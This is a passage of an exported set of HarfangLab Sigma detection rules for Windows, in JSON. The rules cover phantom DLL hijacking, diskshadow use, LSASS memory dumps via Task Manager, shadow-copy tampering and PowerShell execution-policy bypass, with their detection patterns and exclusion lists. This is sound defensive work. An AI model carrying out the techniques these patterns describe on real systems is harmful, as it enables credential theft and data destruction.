'?:\\Windows\\profapi.dll'\n - '?:\\Windows\\PROPSYS.dll'\n - '?:\\Windows\\shell32.dll'\n - '?:\\Windows\\srvcli.dll'\n - '?:\\Windows\\SspiCli.dll'\n - '?:\\Windows\\TWINAPI.dll'\n - '?:\\Windows\\UMPDC.dll'\n - '?:\\Windows\\urlmon.dll'\n - '?:\\Windows\\USERENV.dll'\n - '?:\\Windows\\UxTheme.dll'\n - '?:\\Windows\\WININET.dll'\n - '?:\\Windows\\Wldp.dll'\n - '?:\\Windows\\WTSAPI32.dll'\n Image|endswith: '\\explorer.exe'\n\n exclusion_explorerpatcher:\n Product: 'ExplorerPatcher'\n Company: 'VALINET Solutions SRL'\n ImageLoaded: 
'?:\\windows\\dxgi.dll'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "77fd5223-a8d4-4a30-9c54-4ef3605b960b",
"rule_name": "Phantom DLL Hijacking via explorer.exe",
"rule_description": "Detects a suspicious DLL loaded by the explorer process from the Windows root folder.\nEvery time explorer.exe is started, it attempts to load DLL files from the Windows root folder that are not present there.\nAdversaries may execute their own malicious payloads by planting a DLL in the \"C:\\Windows\" path to exploit the Windows DLL search order.\nIt is recommended to investigate the behavior of the loading process to identify any suspicious activities.\n",
"rule_creation_date": "2024-07-23",
"rule_modified_date": "2025-04-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "782084c7-cf6b-427b-9e05-3eee21b76269",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079242Z",
"creation_date": "2026-03-23T11:45:34.079244Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079249Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/",
"https://attack.mitre.org/techniques/T1490/"
],
"name": "t1490_diskshadow_program_called.yml",
"content": "title: Diskshadow Program Execution\nid: 782084c7-cf6b-427b-9e05-3eee21b76269\ndescription: |\n Detects the execution of diskshadow.exe, a tool used to manage Volume Shadow Service (VSS) shadow copies.\n This can be used maliciously by threat actors or ransomware to create or delete shadow copies, potentially as a precursor to data encryption or destruction.\n It is recommended to investigate the process initiating diskshadow.exe and check for unauthorized changes to shadow copy settings.\n If this is part of a backup script and recurring on your environment, it is highly recommended to whitelist the concerned processes.\nreferences:\n - https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/\n - https://attack.mitre.org/techniques/T1490/\ndate: 2020/09/28\nmodified: 2025/09/23\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1490\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Diskshadow\n - classification.Windows.Behavior.Deletion\n - classification.Windows.Behavior.VolumeShadowCopy\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\diskshadow.exe'\n # renamed binaries\n - OriginalFileName: 'diskshadow.exe'\n\n exclusion_commvault:\n # diskshadow -l \"C:\\Program Files\\Commvault\\ContentStore\\iDataAgent\\FileSystemAgent\\OneTouch\\535781\\DiskshadowOutputSource.txt\" -s \"C:\\Program Files\\Commvault\\ContentStore\\iDataAgent\\FileSystemAgent\\OneTouch\\535781\\DiskshadowScript.txt\"\n # diskshadow -l \"C:\\Program Files\\Commvault\\ContentStore2\\iDataAgent\\FileSystemAgent\\OneTouch\\558744\\DiskshadowOutputSource.txt\" -s \"C:\\Program Files\\Commvault\\ContentStore2\\iDataAgent\\FileSystemAgent\\OneTouch\\558744\\DiskshadowScript.txt\"\n # E:\\CommVault\\Simpana\\iDataAgent\\FileSystemAgent\\OneTouch\\1188660\\DiskshadowOutputSource.txt\"\"\n # note the ContentStore and ContentStore2 ...\n 
CommandLine|contains:\n - ':\\Program Files\\Commvault\\ContentStore*\\iDataAgent\\FileSystemAgent*DiskshadowOutputSource*DiskshadowScript'\n - '\\CommVault\\Simpana\\iDataAgent\\FileSystemAgent\\\\*\\DiskshadowOutputSource.txt'\n\n exclusion_programfiles:\n ProcessParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "782084c7-cf6b-427b-9e05-3eee21b76269",
"rule_name": "Diskshadow Program Execution",
"rule_description": "Detects the execution of diskshadow.exe, a tool used to manage Volume Shadow Service (VSS) shadow copies.\nThis can be used maliciously by threat actors or ransomware to create or delete shadow copies, potentially as a precursor to data encryption or destruction.\nIt is recommended to investigate the process initiating diskshadow.exe and check for unauthorized changes to shadow copy settings.\nIf this is part of a backup script and recurs in your environment, it is highly recommended to whitelist the processes concerned.\n",
"rule_creation_date": "2020-09-28",
"rule_modified_date": "2025-09-23",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1490"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "78397a73-7ba5-4e02-8847-6a3242d29f28",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078198Z",
"creation_date": "2026-03-23T11:45:34.078200Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078204Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1003/001/",
"https://www.oreilly.com/library/view/advanced-infrastructure-penetration/9781788624480/c54099a7-b74b-4130-9c8b-9aba41d42fb5.xhtml",
"https://www.deepinstinct.com/blog/lsass-memory-dumps-are-stealthier-than-ever-before"
],
"name": "t1003_001_lsass_memory_dump_with_taskmgr.yml",
"content": "title: LSASS Process Memory Dumped via taskmgr.exe\nid: 78397a73-7ba5-4e02-8847-6a3242d29f28\ndescription: |\n Detects an attempt to dump the LSASS' process memory using taskmgr.\n Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\n These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\n It is recommended to analyze the user session for suspicious activities, investigate any further malicious actions on the host and to start memory forensics to determine stolen credentials.\nreferences:\n - https://attack.mitre.org/techniques/T1003/001/\n - https://www.oreilly.com/library/view/advanced-infrastructure-penetration/9781788624480/c54099a7-b74b-4130-9c8b-9aba41d42fb5.xhtml\n - https://www.deepinstinct.com/blog/lsass-memory-dumps-are-stealthier-than-ever-before\ndate: 2021/04/30\nmodified: 2025/02/07\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Image|endswith: '\\Taskmgr.exe'\n Path|endswith: '\\lsass*.DMP'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "78397a73-7ba5-4e02-8847-6a3242d29f28",
"rule_name": "LSASS Process Memory Dumped via taskmgr.exe",
"rule_description": "Detects an attempt to dump the LSASS process memory using taskmgr.\nAdversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\nThese credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\nIt is recommended to analyze the user session for suspicious activities, investigate any further malicious actions on the host, and start memory forensics to determine which credentials were stolen.\n",
"rule_creation_date": "2021-04-30",
"rule_modified_date": "2025-02-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7844c8c3-e241-4242-8895-60841cc6f2b3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090116Z",
"creation_date": "2026-03-23T11:45:34.090118Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090122Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rmactivate_isv.yml",
"content": "title: DLL Hijacking via rmactivate_isv.exe\nid: 7844c8c3-e241-4242-8895-60841cc6f2b3\ndescription: |\n Detects potential Windows DLL Hijacking via rmactivate_isv.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rmactivate_isv.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\cryptsp.dll'\n - '\\msdrm.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7844c8c3-e241-4242-8895-60841cc6f2b3",
"rule_name": "DLL Hijacking via rmactivate_isv.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rmactivate_isv.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "784b1d19-3290-4508-abce-87295ed4de1a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086932Z",
"creation_date": "2026-03-23T11:45:34.086935Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086942Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1490/"
],
"name": "t1490_vss_com_loaded_unsigned_process.yml",
"content": "title: VSS COM Object DLL Loaded by Unsigned Process\nid: 784b1d19-3290-4508-abce-87295ed4de1a\ndescription: |\n Detects when the VSS COM Object DLL (vss_ps.dll) is loaded by an unsigned process.\n This could be the sign of a possible attempt by an attacker to delete Volume Shadow Copies.\n Volume Shadow Copies (VSS) are partial copy-on-write clones of the filesystem that can be used as restoration points when a system is corrupted or encrypted by a ransomware.\n It is recommended to analyze the process loading the DLL and to look for signs of ransomware-related activities on the host.\nreferences:\n - https://attack.mitre.org/techniques/T1490/\ndate: 2021/08/03\nmodified: 2025/11/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1490\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.VolumeShadowCopy\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n OriginalFileName: 'VSS_PS.DLL'\n Signed: 'true'\n\n exclusion_process_signed:\n ProcessSigned: 'true'\n\n exclusion_error:\n # if we cannot read info about the file, imphash will be full of 0\n ProcessImphash: '00000000000000000000000000000000'\n ProcessSize: -1\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_image:\n ProcessImage:\n - '?:\\Windows\\System32\\vssadmin.exe'\n - '?:\\Windows\\System32\\SrTasks.exe'\n - '?:\\Windows\\System32\\diskshadow.exe'\n - '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n - '?:\\Windows\\System32\\dllhost.exe'\n - '?:\\NTNX\\ERA_BASE\\era_engine\\stack\\windows\\vss\\vss-agent\\EraVssHwProvider.exe'\n - '?:\\NTNX\\ERA_BASE\\era_engine\\stack\\windows\\vss\\vss-agent\\era_vss_requestor.exe'\n\n exclusion_svchost:\n ProcessImage: '?:\\Windows\\system32\\svchost.exe'\n ProcessParentImage: 
'?:\\Windows\\System32\\services.exe'\n\n exclusion_dfir_orc:\n ProcessDescription: 'DFIR-ORC Utility'\n ProcessOriginalFileName: 'DFIR-ORC'\n\n exclusion_searchindexer:\n ProcessImage: '?:\\Windows\\System32\\SearchIndexer.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_werfault:\n ProcessImage: '?:\\Windows\\System32\\WerFault.exe'\n ProcessParentCommandLine: '?:\\Windows\\System32\\svchost.exe -k WerSvcGroup'\n\n exclusion_srtasks1:\n ProcessImage: '?:\\Windows\\System32\\SrTasks.exe'\n ProcessDescription: 'Microsoft® Windows System Protection background tasks.'\n ProcessOriginalFileName: 'srtasks.exe'\n exclusion_srtasks2:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\srtasks.exe ExecuteScheduledSPPCreation'\n ProcessParentImage: '?:\\Windows\\System32\\svchost.exe'\n\n # System Restore Restore Operation Library\n exclusion_srrstr:\n ProcessImage: '?:\\Windows\\System32\\rundll32.exe'\n ProcessCommandLine: '?:\\windows\\system32\\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation'\n\n exclusion_cobian:\n ProcessImage|endswith:\n - '\\Cobian Backup 1?\\cbVSCService1?.exe'\n - '\\Cobian Backup ??\\cbVSCService.exe'\n - '\\CobianBackup\\cbVSCService1?.exe'\n - '\\CobianBackup\\cbVSCService.exe'\n\n exclusion_vssvc:\n ProcessImage: '?:\\Windows\\System32\\VSSVC.exe'\n\n exclusion_forensit:\n ProcessParentImage: '?:\\ProgramData\\ForensiT\\Transwiz\\Deployment Files\\Transwiz.exe'\n ProcessImage: '?:\\Windows\\System32\\profhlp.exe'\n\n exclusion_dismhost:\n ProcessImage:\n # C:\\$WinREAgent\\Scratch\\7DB77FBA-2B90-4075-9F39-1861805CCDF9\\DismHost.exe\n - '?:\\\\?WinREAgent\\Scratch\\\\????????-????-????-????-????????????\\DismHost.exe'\n # C:\\$WINDOWS.~BT\\Work\\5F70CACE-38E3-45F7-A063-2BA837DE87EF\\DismHost.exe\n - '?:\\\\?WINDOWS.?BT\\Work\\\\????????-????-????-????-????????????\\DismHost.exe'\n\n exclusion_office2016_install:\n ProcessDescription: 'Microsoft Setup Bootstrapper'\n ProcessOriginalFileName: 'setup.exe'\n 
ProcessProduct: 'Microsoft Setup Bootstrapper'\n ProcessCompany: 'Microsoft Corporation'\n\n exclusion_ms_iaasbcdrextension:\n ProcessInternalName: 'IaaSBcdrExtension.exe'\n ProcessProduct: 'Microsoft® Azure Backup'\n ProcessDescription: 'IaaSBcdrExtension'\n\n exclusion_profhlp:\n ProcessImage: '?:\\Windows\\System32\\profhlp.exe'\n ProcessDescription: 'User Profile Migration Helper'\n ProcessCompany: 'ForensiT'\n\n exclusion_veeam_guesthelper:\n ProcessImage: '?:\\windows\\VeeamVssSupport\\VeeamGuestHelper.exe'\n ProcessCompany: 'Veeam Software Group GmbH'\n\n exclusion_veeam_archiver_proxy:\n ProcessOriginalFileName: 'Veeam.Archiver.Proxy.exe'\n ProcessDescription: 'Veeam.Archiver.Proxy'\n ProcessCompany: 'Veeam Software Group GmbH'\n\n exclusion_oracle:\n # E:\\oracle\\product\\11.2.0\\dbhome_1\\BIN\\oravssw.exe\n # E:\\oracle\\product\\12.2.0\\db\\bin\\oravssw.exe\n # E:\\PRODUCT\\19.3\\db_home\\bin\\oravssw.ex\n # E:\\Oracle\\bin\\oravssw.exe\n # ...\n ProcessImage: '*\\bin\\oravssw.exe'\n\n exclusion_unsigned_rundll32_win7:\n ProcessSha256: '3fa4912eb43fc304652d7b01f118589259861e2d628fa7c86193e54d5f987670'\n\n exclusion_dismplusplus:\n - ProcessOriginalFileName: 'Dism++.exe'\n ProcessImage|endswith: '\\Dism++*.exe'\n - ProcessImage|endswith: '\\Dism++\\Dism++x64.exe'\n\n exclusion_aregiev:\n ProcessImage:\n - '?:\\ProgramData\\Aregiev??\\VSS\\VSS Aregiev??.exe'\n - '?:\\ProgramData\\AvenioV??\\VSS\\VSS AvenioV??.exe'\n\n exclusion_unitrends:\n ProcessImage: '*\\WBPS.exe'\n ProcessCompany: 'Unitrends Corporation'\n\n exclusion_vss4dserver:\n ProcessImage: '?:\\ProgramData\\4D Server\\VSS\\VSS 4D Server.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_vssressource:\n ProcessImage: '?:\\ProgramData\\Ressource\\VSS\\VSS Ressource.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_rubrik:\n ProcessCommandLine: '?:\\Users\\\\*\\AppData\\Local\\Temp\\rubrik_vmware*\\snaptool.exe -Snapshot'\n\n 
exclusion_tiworker:\n ProcessCommandLine:\n - '?:\\Windows\\winsxs\\x86_microsoft-windows-servicingstack*\\TiWorker.exe -Embedding'\n - '?:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack*\\TiWorker.exe -Embedding'\n\n exclusion_nedap:\n ProcessOriginalFileName: 'LibTagManager.exe'\n ProcessDescription: 'LibTagManager'\n\n exclusion_regparser:\n ProcessImage: '?:\\\\*\\regparser_cpp\\x64\\release\\regparser_cpp.exe'\n\n exclusion_npbackup:\n ProcessImage|endswith: '\\npbackup\\restic.exe'\n ProcessParentImage|endswith:\n - '\\NPBACKUP\\npbackup-cli.exe'\n - '\\NPBackup\\npbackup-gui\\npbackup-gui.exe'\n\n exclusion_fdj:\n ProcessOriginalFileName: 'FDJ.exe'\n ProcessProduct:\n - 'FDJ'\n - 'Middleware BYG Informatique'\n\n exclusion_irisdb:\n ProcessOriginalFileName:\n - 'irisdb.exe'\n - 'cache.exe'\n ProcessDescription:\n - 'InterSystems IRIS Kernel'\n - \"Cache' Kernel\"\n\n exclusion_sv:\n ProcessImage:\n - '?:\\ProgramData\\SV??\\VSS\\VSS SV??.exe'\n - '?:\\ProgramData\\Ajaris\\VSS\\VSS ajaris.exe'\n - '?:\\ProgramData\\eo\\VSS\\VSS eo.exe'\n\n exclusion_hdclone:\n ProcessOriginalFileName: 'svc.win64.service.srv'\n ProcessDescription|contains: 'VSS proxy'\n\n exclusion_samlab:\n ProcessOriginalFileName: 'SDI_?.??.?.exe'\n ProcessProduct: 'Snappy Driver Installer'\n ProcessCompany: 'www.SamLab.ws'\n\n exclusion_migwiz:\n ProcessOriginalFileName: 'migwiz.exe'\n ProcessDescription: 'Windows Easy Transfer Application'\n ProcessCompany: 'Microsoft Corporation'\n\n exclusion_wmiprvse:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\wbem\\wmiprvse.exe -secured -Embedding'\n\n exclusion_kentica:\n ProcessImage: '?:\\ProgramData\\KentikaServer\\VSS\\VSS KentikaServer.exe'\n\n exclusion_restic:\n ProcessImage|endswith: '\\restic.exe'\n ProcessCommandLine|contains: 'restic.exe backup -r '\n\n exclusion_clbackup:\n ProcessImage|endswith: '\\CLBackup.exe'\n ProcessOriginalFileName: 'clBackup.exe'\n ProcessCompany: 'Commvault'\n\n condition: selection and not 1 of 
exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "784b1d19-3290-4508-abce-87295ed4de1a",
"rule_name": "VSS COM Object DLL Loaded by Unsigned Process",
"rule_description": "Detects when the VSS COM Object DLL (vss_ps.dll) is loaded by an unsigned process.\nThis could be the sign of a possible attempt by an attacker to delete Volume Shadow Copies.\nVolume Shadow Copies (VSS) are partial copy-on-write clones of the filesystem that can be used as restoration points when a system is corrupted or encrypted by a ransomware.\nIt is recommended to analyze the process loading the DLL and to look for signs of ransomware-related activities on the host.\n",
"rule_creation_date": "2021-08-03",
"rule_modified_date": "2025-11-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1490"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "785695ea-ccf6-4b41-914c-1f0522b2cd71",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079158Z",
"creation_date": "2026-03-23T11:45:34.079160Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079164Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1"
],
"name": "t1562_001_powershell_restriction_removed.yml",
"content": "title: PowerShell Execution Policy Changed\nid: 785695ea-ccf6-4b41-914c-1f0522b2cd71\ndescription: |\n Detects PowerShell execution policy being changed to Bypass or Unrestricted globally, in the Windows registry.\n Attackers may want to alter the PowerShell execution policy to simplify the execution of malicious or unsigned scripts.\n It is recommended to analyze the process responsible for the registry edit to look for malicious content or actions.\n It is also recommended to look for the subsequent execution of suspicious PowerShell scripts.\nreferences:\n - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1\ndate: 2020/11/23\nmodified: 2025/01/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft\\.PowerShell\\ExecutionPolicy'\n Details:\n - 'Bypass'\n - 'Unrestricted'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "785695ea-ccf6-4b41-914c-1f0522b2cd71",
"rule_name": "PowerShell Execution Policy Changed",
"rule_description": "Detects PowerShell execution policy being changed to Bypass or Unrestricted globally, in the Windows registry.\nAttackers may want to alter the PowerShell execution policy to simplify the execution of malicious or unsigned scripts.\nIt is recommended to analyze the process responsible for the registry edit to look for malicious content or actions.\nIt is also recommended to look for the subsequent execution of suspicious PowerShell scripts.\n",
"rule_creation_date": "2020-11-23",
"rule_modified_date": "2025-01-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7868bb44-021b-4507-b436-948eee128c21",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.589536Z",
"creation_date": "2026-03-23T11:45:34.589539Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.589546Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/dez_/status/1547612120094650374",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_nativemessagingclient.yml",
